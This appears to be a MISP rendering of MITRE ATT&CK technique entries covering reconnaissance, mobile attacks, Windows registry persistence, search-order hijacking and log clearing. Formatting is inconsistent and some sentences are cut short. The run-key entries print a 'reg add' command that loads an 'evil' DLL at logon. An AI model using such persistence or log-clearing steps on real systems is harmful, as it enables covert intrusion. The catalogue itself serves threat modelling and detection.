An adversary could make educated guesses of the device lock screen’s PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Device Unlock Code Guessing or Brute Force - T1459"

Device Unlock Code Guessing or Brute Force - T1459 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Assign KITs, KIQs, and/or intelligence requirements - T1238

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).

Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs, KIQs, and/or intelligence requirements - T1238"

Assess current holdings, needs, and wants - T1236

This object is deprecated as its content has been merged into the enterprise domain. Please see the
Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)

The tag is: `misp-galaxy:mitre-attack-pattern="Assess current holdings, needs, and wants - T1236"

Table 2918. Table References

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Submit KITs, KIQs, and intelligence requirements - T1237

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).

Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)

The tag is: `misp-galaxy:mitre-attack-pattern="Submit KITs, KIQs, and intelligence requirements - T1237"

Table 2919. Table References

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Common, high volume protocols and software - T1321

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).

Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary’s traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)

The tag is: `misp-galaxy:mitre-attack-pattern="Common, high volume protocols and software - T1321"

Table 2920. Table References

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</table>
Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (e.g., RC4, AES) using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that are typically not encrypted (such as HTTP or FTP).

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001"

Table 2921. Table References

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<td><a href="https://attack.mitre.org/techniques/T1048/001">https://attack.mitre.org/techniques/T1048/001</a></td>
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Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires a pair of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the possession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002"
Non-traditional or less attributable payment options - T1316

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1316).

Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)

The tag is: `misp-galaxy:mitre-attack-pattern="Non-traditional or less attributable payment options - T1316"`

Choose pre-compromised persona and affiliated accounts - T1343

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1343).

For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHGBGary) (Citation: Hacked Social Media Accounts)

The tag is: `misp-galaxy:mitre-attack-pattern="Choose pre-compromised persona and affiliated accounts - T1343"`
Malicious or Vulnerable Built-in Device Functionality - T1473

The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious or Vulnerable Built-in Device Functionality - T1473"

Malicious or Vulnerable Built-in Device Functionality - T1473 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 2925. Table References

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Identify vulnerabilities in third-party software libraries - T1389

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1389).

Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify vulnerabilities in third-party software libraries - T1389"

Table 2926. Table References

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<td><a href="https://attack.mitre.org/techniques/T1389">https://attack.mitre.org/techniques/T1389</a></td>
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</table>
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is `<code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>`. The startup folder path for all users is `<code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>`.

The following run keys are created by default on Windows systems:

- `<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>`
- `<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>`
- `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>`
- `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>`

Run keys may exist under multiple hives. (Citation: Microsoft Wow6432Node 2018) (Citation: Malwarebytes Wow6432Node 2016) The `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code>` is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: `<code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil\[.\]dll"</code>` (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence:

- `<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>`
- `<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>`
- `<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>`
- `<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>`

The following Registry keys can control automatic startup of services during boot:

- `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>`
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

- `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>`
- `<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>`

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code>` and `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code>` subkeys can automatically launch programs.

Programs listed in the load value of the registry key `<code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code>` run when any user logs on.

By default, the multistring `<code>BootExecute</code>` value of the registry key `<code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code>` is set to `<code>autocheck autochk *</code>`. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"`

**Table 2927. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1547/001">https://attack.mitre.org/techniques/T1547/001</a></td>
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<td><a href="https://capec.mitre.org/data/definitions/270.html">https://capec.mitre.org/data/definitions/270.html</a></td>
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Clear Linux or Mac System Logs - T1070.002

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `<code>/var/log/</code>` directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)

- `<code>/var/log/messages/</code>`: General and system-related messages
- `<code>/var/log/secure/</code>` or `<code>/var/log/auth.log</code>`: Authentication logs
- `<code>/var/log/utmp/</code>` or `<code>/var/log/wtmp/</code>`: Login records
- `<code>/var/log/kern.log</code>`: Kernel logs
- `<code>/var/log/cron.log</code>`: Crond logs
- `<code>/var/log/maillog/</code>`: Mail server logs
- `<code>/var/log/httpd/</code>`: Web server access and error logs

The tag is: `misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002"`

Table 2928. Table References

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Add Office 365 Global Administrator Role - T1098.003

An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.

The tag is: `misp-galaxy:mitre-attack-pattern="Add Office 365 Global Administrator Role - T1098.003"`
Compromise Software Dependencies and Development Tools - T1195.001

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001"

Windows File and Directory Permissions Modification - T1222.001

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

The tag is: *misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001"*

### Table References

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### Path Interception by PATH Environment Variable - T1574.007

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.

The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, `<code>%SystemRoot%\system32</code>` (e.g., `<code>C:\Windows\system32</code>`), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.

For example, if `<code>C:\example path</code>` precedes `<code>C:\Windows\system32</code>` is in the PATH environment variable, a program that is named net.exe and placed in `<code>C:\example`
Path</code> will be called instead of the Windows system "net" when "net" is executed from the command-line.

The tag is: `misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007"`

Table 2932. Table References

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Path Interception by Search Order Hijacking - T1574.008

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

The tag is: `misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008"`

Table 2933. Table References

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</table>
Registry Run Keys / Startup Folder - T1060

Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

The following run keys are created by default on Windows systems: *
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> *
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> *
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code> *
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> *

The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx:
<code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence: *
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> *
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> *
<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> *
<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot: *
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> *
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> *
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code> *
<code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The \texttt{HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit} and \texttt{HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell} subkeys can automatically launch programs.

Programs listed in the load value of the registry key \texttt{HKEY\_CURRENT\_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows} run when any user logs on.

By default, the multistring BootExecute value of the registry key \texttt{HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager} is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: \texttt{misp-galaxy:mitre-attack-pattern=\"Registry Run Keys / Startup Folder - T1060\"}

Registry Run Keys / Startup Folder - T1060 has relationships with:

- revoked-by: \texttt{misp-galaxy:mitre-attack-pattern=\"Registry Run Keys / Startup Folder - T1547.001\"} with estimative-language:likelihood-probability=\"almost-certain\"

\textit{Table 2934. Table References}

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\textbf{Exploit SS7 to Redirect Phone Calls/SMS - T1449}

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS)
to a phone number under the attacker's control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication (Citation: TheRegister-SS7).

The tag is: `misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449"`

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**Assess security posture of physical locations - T1302**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).

Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)

The tag is: `misp-galaxy:mitre-attack-pattern="Assess security posture of physical locations - T1302"`

---

**Determine domain and IP address space - T1250**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).

Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation:...
RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine domain and IP address space - T1250"

Table 2937. Table References

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Research visibility gap of security vendors - T1290

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1290).

If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-attack-pattern="Research visibility gap of security vendors - T1290"

Table 2938. Table References

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Exploit SS7 to Track Device Location - T1450

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450"

Table 2939. Table References

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Access Sensitive Data in Device Logs - T1413

On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

The tag is: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413"

Table 2940. Table References

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<td><a href="https://attack.mitre.org/techniques/T1413">https://attack.mitre.org/techniques/T1413</a></td>
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Stolen Developer Credentials or Signing Keys - T1441

An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer's identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).

Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Stolen Developer Credentials or Signing Keys - T1441"

Stolen Developer Credentials or Signing Keys - T1441 has relationships with:


Table 2941. Table References

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<td><a href="https://attack.mitre.org/techniques/T1441">https://attack.mitre.org/techniques/T1441</a></td>
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Component Object Model and Distributed COM - T1175

This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).

Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral
COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). DCOM is transparent middleware that extends the functionality of Component Object Model (COM) beyond a local computer using remote procedure call (RPC) technology.

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM.

Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript. Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.

Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications as well as other Windows objects that contain insecure methods. DCOM can also execute macros in existing documents and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application, bypassing the need for a malicious document.

The tag is: **misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175"**

**Table 2942. Table References**

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<td><a href="https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html">https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html</a></td>
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</table>
Develop social network persona digital footprint - T1342

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).

Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: `misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342"`

**Table 2943. Table References**

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Assess vulnerability of 3rd party vendors - T1298

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).

Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)

The tag is: `misp-galaxy:mitre-attack-pattern="Assess vulnerability of 3rd party vendors - T1298"`

**Table 2944. Table References**

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Manipulate App Store Rankings or Ratings - T1452

An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

The tag is: `misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452"`

Acquire OSINT data sets and information - T1247

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1247).

Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)

The tag is: `misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247"`

Acquire OSINT data sets and information - T1247 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277"` with estimative-language:likelihood-probability="almost-certain"
- related-to: `misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266"` with estimative-language:likelihood-probability="almost-certain"

Acquire OSINT data sets and information - T1266

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).

Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)
Acquire OSINT data sets and information - T1266 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277" with estimative-language:likelihood-probability="almost-certain"
- related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247" with estimative-language:likelihood-probability="almost-certain"

**Assess opportunities created by business deals - T1299**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1299).

During mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other
non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)

The tag is: `misp-galaxy:mitre-attack-pattern="Assess opportunities created by business deals - T1299"`

Table 2949. Table References

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**SSL certificate acquisition for trust breaking - T1338**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).

Fake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)

The tag is: `misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for trust breaking - T1338"`

Table 2950. Table References

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**Identify resources required to build capabilities - T1348**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1348).

As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify resources required to build capabilities - T1348"`

Table 2951. Table References

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</table>
Hardware or software supply chain implant - T1365

